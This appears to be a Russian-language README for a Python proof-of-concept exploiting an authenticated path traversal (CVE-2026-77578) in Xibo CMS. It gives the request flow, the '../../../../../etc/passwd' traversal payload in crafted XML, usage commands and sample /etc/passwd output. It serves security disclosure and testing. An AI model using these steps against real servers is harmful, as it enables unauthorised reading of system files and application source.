
Python proof-of-concept, эксплуатирующий CVE-2026-77578 — аутентифицированный обход пути в Xibo CMS, позволяющий читать произвольные локальные файлы через специально сформированный импорт XML-шаблонов.
CVE-2026-77578 — это уязвимость произвольного локального чтения файлов с аутентификацией в Xibo CMS.
Аутентифицированный пользователь с правами администратора или доступом к шаблонам модулей может импортировать специально созданный XML-шаблон, содержащий ресурс на основе пути с последовательностью обхода. Полученный ресурс затем может быть доступен через конечную точку ресурсов модуля, что заставляет Xibo вернуть содержимое указанного локального файла.
<= 4.4.3>= 4.4.4AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)Xibo опубликовал уязвимость как GHSA-pc3g-2hhm-46qc, подтвердив, что версии <= 4.4.3 уязвимы, а >= 4.4.4 исправлены. В уведомлении присвоен высокий уровень опасности с оценкой CVSS v3.1 8.8 и указан CVE-2026-77578.
Предоставленный PoC на Python автоматизирует процесс эксплуатации:
/developer/template/import./module/asset/<asset-id>.python3 poc.py <URL> -u <USERNAME> -p <PASSWORD> -f <FILE>
Пример:
python3 poc.py http://localhost \
-u xibo_admin \
-p password \
-f /etc/passwd
Другой пример:
python3 poc.py http://localhost \
-u xibo_admin \
-p password \
-f /etc/os-release
Опция -f по умолчанию имеет значение /etc/passwd.
Ниже демонстрируется успешное получение /etc/passwd:
==============================================
FILE CONTENT
==============================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

Authenticated User
|
v
GET /developer/template/view
|
v
Extract X-XSRF-TOKEN
|
v
POST /developer/template/import
|
| Crafted XML
| path="../../../../../etc/passwd"
v
Xibo creates the asset
|
v
GET /module/asset/<asset-id>
|
v
Contents of local file returned
Уязвимость была успешно подтверждена на нескольких файлах в локальной тестовой среде Xibo CMS 4.4.3, включая:
/etc/passwd/etc/hosts/etc/os-release/var/www/cms/web/index.phpТест с исходным файлом PHP демонстрирует, что проблема способна возвращать исходный код приложения, а не только системные метаданные.
Успешная эксплуатация позволяет аутентифицированному злоумышленнику с необходимыми привилегиями шаблонов модулей читать произвольные файлы, доступные процессу приложения Xibo.
В зависимости от развёртывания это может раскрыть:
Данное доказательство концепции предоставлено исключительно для авторизованных исследований в области безопасности и защитного тестирования.
Тестируйте только те системы, которыми вы владеете или на оценку которых у вас есть явное разрешение.
CVE-2026-77578/
├── poc.py
├── README.md
├── LICENSE
├── .gitignore
└── screenshots/
└── poc-output.png